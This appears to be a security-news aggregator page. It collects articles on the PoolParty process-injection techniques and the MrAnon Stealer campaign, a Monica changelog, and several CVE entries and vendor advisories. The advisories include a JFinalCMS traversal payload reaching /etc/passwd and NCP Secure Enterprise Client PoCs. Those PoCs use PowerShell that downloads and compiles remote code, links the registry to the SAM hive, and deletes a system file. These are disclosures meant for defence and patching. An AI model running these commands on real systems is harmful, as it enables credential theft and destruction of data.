A new collection of eight process injection techniques, collectively dubbed PoolParty, could be exploited to achieve code execution in Windows systems while evading endpoint detection and response (EDR) systems.
SafeBreach researcher Alon Leviev said the methods are "capable of working across all processes without any limitations, making them more flexible than existing process

Endpoint Security / Malware

A new collection of eight process injection techniques, collectively dubbed **PoolParty**, could be exploited to achieve code execution in Windows systems while evading endpoint detection and response (EDR) systems.

SafeBreach researcher Alon Leviev said the methods are "capable of working across all processes without any limitations, making them more flexible than existing process injection techniques."

The findings were first presented at the Black Hat Europe 2023 conference last week.

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

Process injection refers to an evasion technique used to run arbitrary code in a target process. A wide range of process injection techniques exists, such as dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging.

PoolParty is so named because it's rooted in a component called Windows user-mode thread pool, leveraging it to insert any type of work item into a target process on the system.

It works by targeting worker factories – which refer to Windows objects that are responsible for managing thread pool worker threads – and overwriting the start routine with malicious shellcode for subsequent execution by the worker threads.

"Other than the queues, the worker factory that serves as the worker threads manager may be used to take over the worker threads," Leviev noted.

SafeBreach said it was able to devise seven other process injection techniques using the task queue (regular work items), I/O completion queue (asynchronous work items), and the timer queue (timer work items) based on the supported work items.

PoolParty has been found to achieve 100% success rate against popular EDR solutions, including those from CrowdStrike, Cybereason, Microsoft, Palo Alto Networks, and SentinelOne.

The disclosure arrives nearly six months after Security Joes disclosed another process injection technique dubbed Mockingjay could be exploited by threat actors to bypass security solutions to execute malicious code on compromised systems.

"Though modern EDRs have evolved to detect known process injection techniques, our research has proven that it is still possible to develop novel techniques that are undetectable and have the potential to make a devastating impact," Leviev concluded.

"Sophisticated threat actors will continue to explore new and innovative methods for process injection, and security tool vendors and practitioners must be proactive in their defense against them."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New PoolParty Process Injection Techniques Outsmart Top EDR Solutions

A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user.

**v5.0.0-beta.3**

**5.0.0-beta.3 (2023-10-29)****Bug Fixes**

*   add doctrine/dbal (#6817) (67a3acf)
*   correct ordering of contacts based on preferred displaying of names (#6962) (a46e92b)
*   default template cant be deleted (#6911) (eef206d)
*   fix Dockerfile (#6966) (452f59f)
*   fix locale in DatePicker (#6958) (e6157e7)
*   fix quick facts not being able to be saved (#6912) (b6b78e5)
*   fix sync\_tokens id table change (#6801) (60bdd08)
*   fix syntax error (#6957) (1b351e4)
*   fix uploadcare (#6942) (e9c4f9d)

**Features**

*   add logs for addressbook subscriptions (#6841) (094916d)
*   add monica:getversion command (#6965) (cd1b699)
*   add more vcard exports (#6878) (457081c)
*   add webauthn cookie when registering a new key (#6952) (142de32)
*   download one contact as vcard (#6747) (dd27398)
*   implement DAV client subscriptions (#6751) (2286e79)
*   implement Dav for groups (#6799) (b9783c6)
*   update langs and monica:localize command. Add 3 new languages. (#6917) (2fe7abc)

**v5.0.0-beta.2**

**5.0.0-beta.2 (2023-07-08)****Features**

*   add instance administrator (#6670) (ab3f380)
*   improve telegram setup workflow (#6734) (9ee07fb)

**Bug Fixes**

*   fix AddPostToSliceOfLife (#6681) (7c45d0d)
*   fix address image show (#6672) (ec3a44d)
*   fix addresses report list (#6725) (9c86677)
*   fix basic auth with token (#6673) (fab6c32)
*   fix call reasons (#6686) (ba06e85)
*   fix contact selector (#6680) (05c1333)
*   fix empty useForm() (#6671) (06851c9)
*   fix help links (#6727) (63574d1)
*   fix important date form (#6722) (46f4713)
*   fix ModuleFamilySummaryViewHelper (#6682) (7e77bea)
*   fix sentry integration and some slight errors (#6651) (d94c4ec)
*   fix setting a locale (#6721) (ddcb6e2)
*   fix some vue errors (#6685) (00548f8)
*   fix useForm (#6724) (d356688)
*   fix vue errors (#6707) (c69297f)
*   fix vue refs targets (#6675) (133e426)
*   fix vue refs targets (again) (#6676) (7b8997c)

**v5.0.0-beta.1**

**5.0.0-beta.1 (2023-06-10)**

First pre-release of chandler.  
See https://www.monicahq.com/blog/chandler-is-in-beta

**Bug Fixes**

*   bug fix on loan (monicahq/chandler#85) (bfe5ebe)
*   fix sortByCollator collection macro return keys (monicahq/chandler#556) (c3605ba)
*   fix address pivot (monicahq/chandler#419) (59924a2)
*   fix app\_version warnings (monicahq/chandler#411) (b9e32e9)
*   fix avatar not showing on reminder list (monicahq/chandler#229) (3d9cc3b)
*   fix avatar not uploaded in tabs (5c98f0c)
*   fix avatars here and there (monicahq/chandler#180) (438782f)
*   fix batch of reminders (monicahq/chandler#402) (a23da58)
*   fix batch of scheduled reminders (monicahq/chandler#401) (6a0d603)
*   fix cities blank state (monicahq/chandler#473) (9d2d103)
*   fix contact being clickable when choosing a contact (monicahq/chandler#398) (79f8b9c), closes monicahq/chandler#395
*   fix contact information without a protocol (monicahq/chandler#347) (e53b7ac)
*   fix contacts not being displayed (monicahq/chandler#470) (f7e8101)
*   fix cron again (monicahq/chandler#403) (50c98da)
*   fix dates not being saved (monicahq/chandler#76) (5df1726)
*   fix destroy file (monicahq/chandler#488) (5234096)
*   fix documentation links (monicahq/chandler#264) (2850688)
*   fix due tasks not being displayed on dashboard (monicahq/chandler#351) (ac1a724)
*   fix edit reminder (monicahq/chandler#152) (0759d58)
*   fix emojis on windows (monicahq/chandler#483) (b8b5950)
*   fix empty div showing when no tasks on dashboard (monicahq/chandler#379) (4752f68)
*   fix errors handle (monicahq/chandler#487) (8e2d5f8)
*   fix family summary (monicahq/chandler#265) (478d574)
*   fix favicon url (monicahq/chandler#247) (7230c5d)
*   fix flash emit (monicahq/chandler#389) (03f332c)
*   fix french translation (monicahq/chandler#524) (a7e2302)
*   fix generating api doc (monicahq/chandler#360) (2e11c10)
*   fix i18n for contact selector (monicahq/chandler#489) (2324f87)
*   fix i18n plural forms (monicahq/chandler#486) (721abb9)
*   fix important date type cant be null (monicahq/chandler#397) (6e9362f), closes monicahq/chandler#377
*   fix inconsistency in wording (monicahq/chandler#485) (24786cd)
*   fix life event modal not reset upon save (monicahq/chandler#510) (c791202)
*   fix meilisearch indexes import (monicahq/chandler#378) (55b4bbb)
*   fix memcache fortrabbit integration (monicahq/chandler#372) (8bcd595)
*   fix mixin added for testing (monicahq/chandler#355) (bc6b273)
*   fix months discrimination (monicahq/chandler#560) (1c8e84e)
*   fix notifications looping when processing the batch (monicahq/chandler#392) (dd6d45f), closes monicahq/chandler#390 monicahq/chandler#391
*   fix password saving at registration (monicahq/chandler#306) (88e5502)
*   fix reminders (monicahq/chandler#154) (9227a1a)
*   fix reminders one more time (monicahq/chandler#405) (bf4a138)
*   fix scout config for groups (monicahq/chandler#374) (070503e)
*   fix scribe generate (monicahq/chandler#310) (df63469)
*   fix scribe generate on docker image (monicahq/chandler#309) (74ccb06)
*   fix search with scout database (monicahq/chandler#223) (62978fa)
*   fix setup and dummy in case meilisearch not activated (monicahq/chandler#185) (6a85bca)
*   fix signup form not working (monicahq/chandler#221) (d291bbe)
*   fix socialite integration (monicahq/chandler#554) (2fddbe1)
*   fix suffix label (\[monicahq/chandler#394\](https://github.com/...

**v4.0.0**

**4.0.0 (2023-01-30)****⚠ BREAKING CHANGES**

*   switch to php 8.1+ dependency (#6250)
*   drop php 7.4 support (#6246)

**Features**

*   add DB\_TESTING\_PORT in database config (#6201) (fefa799)
*   add disallow in robots.txt (#6268) (be2e280)
*   add name to user resource (#6174) (8465803)
*   check male translation and fall back to generic (#6039) (4ba9062)
*   drop php 7.4 support (#6246) (84d0232)
*   focus tags input box (#6392) (2d75053)
*   load more activities (#5973) (117fe19)
*   switch to php 8.1+ dependency (#6250) (6a7f49f)

**Bug Fixes**

*   allow configuring port for test database (#6236) (aeffb71), closes #6200
*   allow empty completed\_at task date (#6025) (d4504e3)
*   change APP\_TRUST\_PROXIES to APP\_TRUSTED\_PROXIES (#6095) (5f63bed)
*   Continuously pressing enter shows empty tags (#6314) (2386096), closes #6235
*   fix avatar not being loaded on dashboard (#6224) (7c8105c)
*   fix blurry modals from sweet-modal-vue (#6026) (4cc1d8f)
*   fix Journal sidebar width on mobile (#6027) (d690bf6)
*   fix laravel cloudflare proxy (#6264) (d0b50fe)
*   life event creation with unknown month/day (#6046) (d81123b)
*   only include real contacts in carddav sync (#6014) (626f078)
*   **php8.1:** deprecated trim with null value (#6374) (b4c1c03)
*   skip version check if current version is empty (#6137) (4e1e4ee)
*   typo in french translation of nephew (#6074) (ad11e01)
*   vcard bday export format with unknown year (#6087) (f0db671)

**v3.7.0**

**v3.6.1**

**v3.6.0**

**3.6.0 (2022-01-11)****Features**

*   activate Norwegian and Russian languages (#5856) (8bdccbb)
*   add contact soft delete and prunable (#5826) (6f887df)
*   add reminders/upcoming API (#5783) (a3e9b79)
*   export data as json format (#4779) (8c627a2)
*   implement laravel password strength (#5821) (8295be3)
*   improve reliability of pingversion (#5723) (0c791f6)
*   order introductions contact list by first and last name (#5102) (6ff0738)
*   quick add with email (#5182) (80001fc)
*   re-activate adorable avatars with permanent solution (#5872) (ccf6d4f)
*   sync carddav delete contact requests (#5835) (30d97f9)

**Bug Fixes**

*   add link to reminders endpoint at api root (#5801) (337367a)
*   fix Date display with timezone (#5825) (d73e3c4)
*   version display on heroku (#5860) (0cf965f)

**v3.5.0**

**v3.4.0**

**3.4.0 (2021-10-31)****Features**

*   add dependencies node and yarn in Dockerfile (#5635) (48726b5)
*   added URLs to be exported in vCards. (#5609) (38429a2)
*   get weather from weatherapi (#5668) (d19b6ad)
*   retry get gps coordinate when rate limited second (#5615) (8eed44e)
*   searchable contacts on introductions form (#5632) (cc05552)
*   update last called attribute (#5614) (83e1d68)

**Bug Fixes**

*   fix carddav addressbook add (#5660) (ac44cfb)
*   fix creating default gender (#5607) (6c5ac48)
*   fix distant contact etag handle (#5605) (1da427f)
*   fix duplicate reminders on dashboard (#5569) (bb97115)
*   fix edit an activity with a category (#5661) (9128db8)
*   fix gift api without passport (#5664) (7939a5f)
*   fix import table layout (#5662) (cd138c8)
*   fix vcard company import (#5616) (0dd4b23)

**v3.3.1**

CVE-2023-50465: Releases · monicahq/monica

By Waqas
Received an email about a hotel reservation you didn't book? It's likely a phishing attempt delivering the MrAnon Stealer malware.
This is a post from HackRead.com Read the original post: Fake hotel reservation phishing scam uses PDF links to spread MrAnon Stealer

MrAnon Stealer is capable of stealing data and gathering information from cryptocurrency wallets, browsers, messaging apps and VPN clients.

Cybersecurity researchers at FortiGuard Labs have brought to light a new email phishing campaign exploiting false hotel reservations to lure unsuspecting victims. The phishing attack involves the deployment of a malicious PDF file that, once opened, unleashes a chain of events leading to the activation of the MrAnon Stealer malware.

Rather than relying on complex technical details, the attackers cunningly pose as a hotel reservation company, sending phishing emails under the subject, “December Room Availability Query.” The email body contains fabricated holiday season booking details, with the malicious PDF file hiding a downloader link.

The phishing email (Screenshot credit: Fortinet Labs)

Upon closer inspection, cybersecurity experts at FortiGuard Labs uncovered a multi-stage process involving .NET executable files, PowerShell scripts, and deceptive Windows Form presentations. The attackers, posing as a hotel reservation company, skillfully navigate through these stages, using tactics like false error messages to cloak the successful execution of the malware.

The MrAnon Stealer, a Python-based infostealer, operates discreetly, compressing its activities with cx-Freeze to slip past detection mechanisms. The malware executes a meticulous process that includes capturing screenshots, retrieving IP addresses, and stealing sensitive data from various applications.

The attackers demonstrate sophistication by terminating specific processes on the victim’s system and masquerading as legitimate connections to fetch IP addresses, country names, and country codes. The stolen data, including credentials, system information, and browser sessions, is compressed, secured with a password, and uploaded to a public file-sharing website.

According to FortiGuard Labs’ blog post, MrAnon Stealer can gather information from cryptocurrency wallets, browsers, and messaging apps such as Discord, Discord Canary, Element, Signal, and Telegram Desktop. Additionally, it targets VPN clients like NordVPN, ProtonVPN, and OpenVPN Connect.

As for its command and control; the attackers use the Telegram channel as a communication medium. The stolen data, system information, and a download link are sent to the attacker’s Telegram channel using a bot token.

MrAnon Stealer on Telegram and its prices & packages for other cybercriminals (Screenshot credit: Fortinet Labs)

This campaign, active and aggressive during November 2023, primarily targeted Germany, as indicated by the surge in queries for the downloader URL during that period. The cybercriminals behind this operation have exhibited a strategic approach, shifting from Cstealer in July and August to the more potent MrAnon Stealer in October and November.

If you are online, you are vulnerable. Therefore, users are advised to exercise caution when dealing with unexpected emails, especially those containing dubious attachments. Cautiousness and commonsense are keys to thwarting cybercriminals’ attempts to exploit human vulnerabilities and compromise online security.

****_RELATED ARTICLES_****

1.  **Booking.com Scam Targeting Guests with Vidar Infostealer**
2.  **Silent Ransom Group Utilizes Callback Phishing for Network Hacks**
3.  **USPS Delivery Phishing Scam Exploits SaaS Providers to Steal Data**
4.  **Iran’s MuddyWater Group Hits Israelis with Fake Memo Spear-Phishing**
5.  **LinkedIn Phishing Scam Exploits Smart Links to Steal Microsoft Accounts**

Fake hotel reservation phishing scam uses PDF links to spread MrAnon Stealer

JFinalCMS 5.0.0 could allow a remote attacker to read files via ../ Directory Traversal in the /common/down/file fileKey parameter.

在/common/down/file路由功能下，可以对参数fileKey设计带有恶意性质内容的文件名实现目录穿越，从而下载已知目录内的任意已知文件名，且该行为并不需要进行登录。

    poc:
    Linux:   /../../../../../../../etc/passwd
    Windows:  /../../../../../../../test.txt （test.txt为测试用的在根目录下的文件）

CVE-2023-50449: JFinalCMS存在未授权目录遍历漏洞 · Issue #I7WGC6 · 樱木/JFinalCMS - Gitee.com

An issue was discovered in Mullvad VPN Windows app before 2023.6-beta1. Insufficient permissions on a directory allow any local unprivileged user to escalate privileges to SYSTEM.

> _Reviewable_ status: 9 of 14 files reviewed, 3 unresolved discussions (waiting on @Jontified)

_mullvad-paths/src/windows.rs line 146 at r3 (raw file):_

>     // Authenticated users SID https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers
>     let (authenticated\_users\_ea, authenticated\_users\_psid) =
>         match create\_explicit\_access("S-1-5-11", GENERIC\_READ) {

This is fine, but it seems like we could have used CreateWellKnownSid(WinAuthenticatedUserSid, ...) and CreateWellKnownSid(WinBuiltinAdministratorsSid, ...) here.

A nice thing about it is that we allocate the memory ourselves, so most of the LocalFrees go away, and we only have to use plain arrays or Vecs. Cleaner, probably?

Though I vaguely recall that this did not work for some reason.

_mullvad-paths/src/windows.rs line 217 at r3 (raw file):_

>     let sid\_wide\_str = get\_wide\_str(sid\_wide\_str);
>     let mut psid = ptr::null\_mut();
>     if 0 == unsafe { ConvertStringSidToSidW(sid\_wide\_str.as\_ptr(), &mut psid) } {

I think we should avoid Yoda conditions, as they're inconsistent with our general code style. The point of these is mainly to prevent accidental assignment, which isn't relevant for if statements in Rust.

CVE-2023-50446: Set permissions on log directory by Jontified · Pull Request #5398 · mullvad/mullvadvpn-app

The Goodix Fingerprint Device, as shipped in Dell Inspiron 15 computers, does not follow the Secure Device Connection Protocol (SDCP) when enrolling via Linux, and accepts an unauthenticated configuration packet to select the Windows template database, which allows bypass of Windows Hello authentication by enrolling an attacker's fingerprint.

CVE-2023-50430: A Touch of Pwn - Part I

In Bitcoin Core through 26.0 and Bitcoin Knots before 25.1.knots20231115, datacarrier size limits can be bypassed by obfuscating data as code (e.g., with OP_FALSE OP_IF), as exploited in the wild by Inscriptions in 2022 and 2023.

CVE-2023-50428: Common Vulnerabilities and Exposures - Bitcoin Wiki

The next parameter in the /accounts/login endpoint of Seafile 9.0.6 allows attackers to redirect users to arbitrary sites.

CVE-2023-28874: Seafile Community Edition - Seafile Admin Manual

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to read registry information of the operating system by creating a symbolic link.

**usd-2022-0005 | NCP Secure Enterprise Client - Insecure Registry Export**

**Advisory ID:** usd-2022-0005  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Insecure Registry Export  
**Security Risk:** High  
**Vendor URL:** https://www.ncp-e.com/  
**Vendor Status:** Fixed

**Introduction**

The _Windows Registry_ is a central storage location for configuration settings on the _Windows_ operating system. Data that is stored  
within the _Windows Registry_ is utilized by several different components, like desktop applications, services, device drivers and also  
the kernel itself. Several locations within the _Windows Registry_ are known to contain sensitive information. The probably most well  
known example is the **HKLM\\SAM** hive, that stores hashed credentials of local user accounts.

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. Within this diagnostic information, the _NCP Secure Enterprise_ client also exports information  
from the _Windows Registry_. During this export, _Registry symbolic links_ are followed and may allow to redirect the export to an arbitrary  
location within the _Windows Registry_.

For such an attack to work, a low privileged user accounts need to be able to create _Registry symbolic links_ within the exported _Registry  
keys_. In the case of the _NCP Secure Enterprise_ client, this is possible, since the client exports all keys under **HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Services\*_recursively. On a default installation of_ Windows_, this_ Registry key _usually contains some keys where low privileged user accounts  
can create_ subkeys_. Newly created_ subkeys _are owned by the creating user and it is possible to create_ Registry symbolic links_within them that point to arbitrary_ Registry _locations. Since the_ symlink\* originates from a trusted** HKLM __hive, it is not restricted  
by_ Microsoft's_ protection features for _Registry symbolic links_.

**Proof of Concept**

The first step is finding a _Registry key_ within **HKEY\_LOCAL\_MACHINE\\SYSTEM\\CurrentControlSet\\Services** that is writable for low privileged  
user accounts. Corresponding keys might vary for different installations, but on our test systems it was always possible to find at least  
one such key. In the following we use the key **HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment** which seems to be available and allows  
the creation of _subkeys_ on most installations.

Within this _Registry key_ we now create a _symbolic link_ pointing to **HKLM\\SAM**

PS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> \[de.usd.SharpLink.RegistryLink\]::CreateKey("HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB")  
\[+\] Creating registry key: HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB  
\[+\] Registry key was successfully created.  
PS C:\\> $r \= New-Object de.usd.SharpLink.RegistryLink("HKLM\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB\\LINK", "HKLM\\SAM")  
PS C:\\> $r.Open()  
\[+\] Creating registry key: \\Registry\\Machine\\System\\CurrentControlSet\\Services\\vds\\Alignment\\SUB\\LINK  
\[+\] Assigning symlink property pointing to: \\Registry\\Machine\\SAM  
\[+\] RegistryLink setup successful!

After the _Registry symbolic link_ is setup, one can start the _Support Assistant_ using the _NCP Secure Enterprise_ client tray icon  
(upper right inside the _Help_ menu). After the _Support Assistant_ was started, it collects support information from the operating system:

The collected files can be viewed either from the _Support Assistant_ directly or by inspecting them in **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*\*.  
Within the** Services.reg **file, one can find the export of the** HKLM\\SAM\*\* hive:

**Fix**

During the collection of support information from the operating system, the _NCP Secure Enterprise_ client software should impersonate  
the user that started the _Support Assistant_. This way, only information that the invoking user is allowed to read can be obtained.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   **2022-02-02** First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is released
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28871: Security Advisory usd-2022-0005 | usd HeroLab

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to delete arbitrary files on the operating system by creating a symbolic link.

**usd-2022-0002 | NCP Secure Enterprise Client - Arbitrary File Delete**

**Advisory ID:** usd-2022-0002  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Arbitrary File Delete  
**Security Risk:** High  
**Vendor URL:** https://www.ncp-e.com/  
**Vendor Status:** Fixed

**Description**

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. The corresponding information is gathered by high privileged services and stored within the directory  
__C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*_. Since this directory is fully user controlled, a low privileged user can create_ symbolic links_within it. This can be used to trick the_ NCP Secure Enterprise\* client to delete arbitrary files on the operating system.

**Proof of Concept**

To perform the arbitrary file delete, the following steps are necessary:

1.  Start the _Support Assistant_ and wait until all diagnostic information has been collected.
2.  Create a _symbolic link_ that originates from **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\\services.txt**  
    and points to the targeted file.
3.  Abort the _Support Assistant_ and restart it.

After these steps have been executed, the targeted file should be deleted. In the following, we demonstrate  
each of the above mentioned steps.

First we start the _Support Assistant_ by using the tray icon of the _NCP Secure Enterprise_ client. The _Support Assistant_  
feature can be found in the upper right of the graphical user interface within the _Help_ menu.

After the diagnostic information has been collected, we create a _symbolic link_ pointing from **C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\\services.txt**  
to the well known **C:\\Windows\\win.ini** file.

PS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> $s \= New-Object de.usd.SharpLink.Symlink("C:\\Users\\<USER>\\AppData\\Local\\Temp\\NCPSupport\\services.txt", "C:\\Windows\\win.ini")  
PS C:\\> $s.Open()  
\[!\] Junction directory C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport is not empty. Delete files? (y/N) y  
\[+\] Creating Junction: C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport \-> \\RPC CONTROL  
\[+\] Creating DosDevice: Global\\GLOBALROOT\\RPC CONTROL\\services.txt \-> \\??\\C:\\Windows\\win.ini  
\[+\] Symlink setup successfully.

Now the _Support Assistant_ is aborted and restarted. After this action has been performed, the **win.ini** does no longer exist.

PS C:\\> dir C:\\Windows\\win.ini  
dir : Der Pfad "C:\\Windows\\win.ini" kann nicht gefunden werden, da er nicht vorhanden ist.  
In Zeile:1 Zeichen:1  
+ dir C:\\Windows\\win.ini  
+ \~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\\Windows\\win.ini:String) \[Get-ChildItem\], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

**Fix**

It is assumed that the _NCP Secure Enterprise_ client checks for already existing diagnostic files before starting  
the _Support Assistant_ and attempts to delete them. This delete operation occurs with high privileges, resulting  
in the vulnerability. Instead, the delete operation should be performed while impersonating the invoking user account.  
This prevents the deletion of files the invoking user has insufficient permissions for.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   2022-02-02 First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is realesed
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

Tag

#windows